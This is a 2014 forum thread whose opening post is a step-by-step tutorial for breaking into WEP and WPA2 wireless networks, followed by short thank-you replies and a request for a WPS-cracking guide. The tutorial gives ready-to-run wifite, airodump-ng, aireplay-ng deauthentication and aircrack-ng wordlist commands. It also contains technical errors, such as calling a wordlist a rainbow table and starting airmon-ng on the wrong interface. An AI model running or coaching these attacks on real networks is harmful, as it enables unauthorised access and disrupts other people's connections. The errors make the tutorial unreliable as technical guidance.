How to Break into WEP and WPA2 Secured Access Points

What's the best way to setup a home network? Why should I care about BGP?

How to Break into WEP and WPA2 Secured Access Points

Post by G3N3T1C5 on Mon Aug 11, 2014 11:02 pm
([msg=82756]see How to Break into WEP and WPA2 Secured Access Points[/msg])

Written by G3N3T1C5

Over the course of the past several months I have spent a good bit of time diving into this subject and thought I would share it with the community. This is meant to be simple and comprehensive, giving a basic understanding on the vulnerabilities with each of these security protocols and a how-to guide on attacking each of them.

What you will need

VMWare or VirtualBox
Kali Linux VM
External WiFi Dongle
(I use a TP-Link TL-WN722N)

Breaking into a WEP Secured Access Point

Wired Equivalent Privacy (WEP) is an outdated security algorithm and is superseded by Wireless Protected Access (WPA/WPA2). It is important to understand why it is flawed and if you know anyone who is still using WEP please let them know how easy it is to penetrate. Over the past year I had taken a Wireless Networking course in which one of the classes, the instructor setup a WEP secured router and we were to break into it. Using a simple tool supplied in the Kali Linux suite called Wifite; I was able to get the key in 36 seconds. Hopefully this gives you an understanding on how insecure WEP is.
Without going into extreme details, the principle behind finding the passphrase is capturing Initialization Vectors (IV’s) also called Starting Variables (SV’s). WEP uses a Stream cipher called RC4 (ARCFOUR) and cannot have the same traffic key used twice. IV’s are used to prevent repetition in the key stream. But when a network is busy with traffic there is a high probability an IV will eventually repeat.

We are going to use wifite for breaking WEP
Open up a command prompt in kali and type.
wifite –wep
Image

The program should begin and put your Wi-Fi Adapter in monitor mode, and because we added the –wep into the command it will begin listening for only WEP secured networks. If you have a router to test this out with, wait until it displays the SSID you chose. When wifite has found it, press CTRL+C and type in the number that your SSID appeared on the list then press enter. Wifite should begin its attack on the network.
Image

As you can see from the picture above at around 10,000 IV’s it will start cracking the passphrase and will display it for you once it is done. One thing about Wifite that I haven’t had too much luck with, but hopefully those of you who use this guide will, is that it performs various attacks to help obtain the key quicker, such as an ARP replay attack. If there is no traffic within the network it will take forever gathering over 10,000 IV’s. Basically an ARP replay attack will generate traffic so that you do not have to wait for a client on the network to do it.

Breaking into a WPA2 Secured Access Point

WPA2 (Wireless Point Access 2) is what is used to secure most access points today. This typically takes much longer breaking into than a WEP secured network. Instead of capturing IV’s, We need to capture a WPA Handshake which is when a client connects to an access point. In this 4 way Handshake is the Hash encryption of the plaintext password for the network, fortunately for us and yet unfortunately for us, the purpose of a Hash is to prevent a hacker from ever finding out the plaintext password. So once we have captured the Handshake, we will run a rainbow table against the hash. Kali Linux already has a rainbow table in it called rockyou.txt which has around 14,000,000 passwords in it. If you end up wanting to get a larger rainbow table there are some more available on the internet, the largest I have found is 1.43 Billion passwords. There will be 5 steps in us breaking into a WPA2 secured access point.
1. Find out the BSSID (Basic Service Set ID) or MAC (Media Access Control) Address of the Access Point
2. Begin to monitor traffic from the clients to the access point.
3. Launch a DeAuth Attack (De-Authentication) against a client within the network.
4. Capture the handshake from the client we have de-authenticated from the network when it re-connects.
5. Running aircrack using our rockyou.txt rainbow table to obtain the password.

We need to first find out what is the interface for our Wi-Fi dongle.

STEP 1:[/b] In a command terminal type iwconfig and your adapter should display, typically as wlan0 for the interface. After that we need to put it in monitor mode.
root@kali:~# airmon-ng start mon0
It should display different wifi networks that are around you and clients your adapter can see that are connected to them. You will need the BSSID and the CH (Channel) for the next part.

Image

[b]STEP 2:

After we have found this information out about the network we will now narrow our view to just that access point and its clients, as well as write a file when the WPA handshake is found.
root@kali:~# airodump-ng –c (your channel) --bssid (MAC address of the access point) –w (whatyouwanttocallthefile) mon0 (the monitor interface we set earlier)
Here is an example
root@kali:~# airodump-ng –c 1 --bssid 00:FF:1C:A2:90:1D –w pentest mon0

You should see something like this
Image

This needs to stay running until a Handshake is captured. We can either leave it on and wait for a client to join the network or we can force a client to rejoin using a DeAuth attack.

STEP 3 and STEP 4:

This step will be short and sweet, you will need both the MAC address of the Access Point and the Client.
To launch the attack, open up another terminal, do not close the one monitoring traffic. In the new command prompt type
aireplay-ng -0 25 -a (MAC of Access Point) -c(MAC of Client) mon0 (interface)
Example
aireplay-ng -0 25 -a 00:FF:1C:A2:90:1D -c 99:C4:FF:5F:8A:B8 mon0
This will cause the client to disconnect from the network and when the attack stops the client will rejoin and you will capture a WPA handshake. The number “25” in the line is how many times aireplay will send DeAuths to the client. If a few minutes go by and you still haven’t captured a handshake you may want to send another attack and increase the number.

Image

STEP 5:
Once it shows that you have captured a WPA handshake (if you did it will display next to the time and date, circled green in my screenshot) press CTRL+C to stop airodump and we are now going to run aircrack with our rainbow table against the handshake, if the password is in our database, it will compare the 2 hashes together and if it’s a match it will display the password for you. I chose a password that I knew was in the rockyou.txt table. At a rate of 600 keys a second it should take you around 8 hours to go through the entire file.
Command is aircrack-ng -w rockyou.txt (what you chose for the name of the capture file)-01.cap
Example: aircrack-ng -w rockyou.txt pentest-01.cap

Image

This concludes my guide on WEP and WPA2.
If you liked this guide or have questions you can leave a comment and I will try and respond to you soon =)
User avatar
G3N3T1C5
New User
New User
 
Posts: 4
Joined: Mon Aug 11, 2014 10:27 pm
Location: Michigan
Blog: View Blog (0)


Re: How to Break into WEP and WPA2 Secured Access Points

Post by Randoph on Tue Aug 12, 2014 3:41 am
([msg=82758]see Re: How to Break into WEP and WPA2 Secured Access Points[/msg])

Just wanna thank you for sharing this, it helps a noob like me out a lot. I'm just gonna save this post and look into it later, when I have a bit more knowlage about networking, and I'm not home at the moment anyway.
Randoph
New User
New User
 
Posts: 41
Joined: Fri Aug 08, 2014 2:48 pm
Blog: View Blog (0)


Re: How to Break into WEP and WPA2 Secured Access Points

Post by G3N3T1C5 on Wed Aug 13, 2014 7:29 am
([msg=82776]see Re: How to Break into WEP and WPA2 Secured Access Points[/msg])

Randoph wrote:Just wanna thank you for sharing this, it helps a noob like me out a lot. I'm just gonna save this post and look into it later, when I have a bit more knowlage about networking, and I'm not home at the moment anyway.


Thanks, Im glad you found it useful. If you have anymore questions feel free to ask and I will do my best to answer them.
User avatar
G3N3T1C5
New User
New User
 
Posts: 4
Joined: Mon Aug 11, 2014 10:27 pm
Location: Michigan
Blog: View Blog (0)


Re: How to Break into WEP and WPA2 Secured Access Points

Post by -Ninjex- on Wed Aug 13, 2014 7:37 am
([msg=82777]see Re: How to Break into WEP and WPA2 Secured Access Points[/msg])

Nice tutorial for beginners, you should turn this into an article.
A word of advice, next time scale down the images, they are too big on display
If you're not willing to learn, no one can help you. If you're determined to learn, no one can stop you.⠠⠵
The absence of evidence is not evidence of absence.
I can explain it for you, but I can't understand it for you.
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1344
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: How to Break into WEP and WPA2 Secured Access Points

Post by Solucian on Wed Aug 13, 2014 10:26 am
([msg=82780]see Re: How to Break into WEP and WPA2 Secured Access Points[/msg])

Great post, thanks for sharing! The WEP part was a bit vague imo (or maybe I just don't know enough about it), but WPA/WPA2 was explained really good.
Solucian
New User
New User
 
Posts: 16
Joined: Mon Aug 11, 2014 8:55 am
Blog: View Blog (0)


Re: How to Break into WEP and WPA2 Secured Access Points

Post by G3N3T1C5 on Wed Aug 13, 2014 10:41 am
([msg=82781]see Re: How to Break into WEP and WPA2 Secured Access Points[/msg])

-Ninjex- wrote:Nice tutorial for beginners, you should turn this into an article.
A word of advice, next time scale down the images, they are too big on display


Thankyou ^_^ The images are definately larger than I would like them to be, I'll go through and scale them so they arent so bulky. Thanks for the suggestion :D

-- Wed Aug 13, 2014 10:46 am --

Solucian wrote:Great post, thanks for sharing! The WEP part was a bit vague imo (or maybe I just don't know enough about it), but WPA/WPA2 was explained really good.


Thanks for your input, I'll try and touch up the part on WEP when I have some time, and your welcome!
User avatar
G3N3T1C5
New User
New User
 
Posts: 4
Joined: Mon Aug 11, 2014 10:27 pm
Location: Michigan
Blog: View Blog (0)


Re: How to Break into WEP and WPA2 Secured Access Points

Post by cyberdrain on Wed Aug 13, 2014 8:44 pm
([msg=82792]see Re: How to Break into WEP and WPA2 Secured Access Points[/msg])

Next up, WPS! At least, that's what I hope for, I like to read different opinions on it. Nice guide OP, keep them coming :)
Free your mind / Think clearly
User avatar
cyberdrain
Addict
Addict
 
Posts: 1109
Joined: Sun Nov 27, 2011 1:58 pm
Blog: View Blog (0)


Re: How to Break into WEP and WPA2 Secured Access Points

Post by G3N3T1C5 on Thu Aug 14, 2014 5:13 pm
([msg=82818]see Re: How to Break into WEP and WPA2 Secured Access Points[/msg])

cyberdrain wrote:Next up, WPS! At least, that's what I hope for, I like to read different opinions on it. Nice guide OP, keep them coming :)


Sure, I will try to make a decent guide on exploiting Wireless Protected Setup (what a joke). Just gotta find some downtime to begin that project along with a few others, but thanks for taking time to let me know you liked this guide.
User avatar
G3N3T1C5
New User
New User
 
Posts: 4
Joined: Mon Aug 11, 2014 10:27 pm
Location: Michigan
Blog: View Blog (0)



Return to Networking

Who is online

Users browsing this forum: No registered users and 0 guests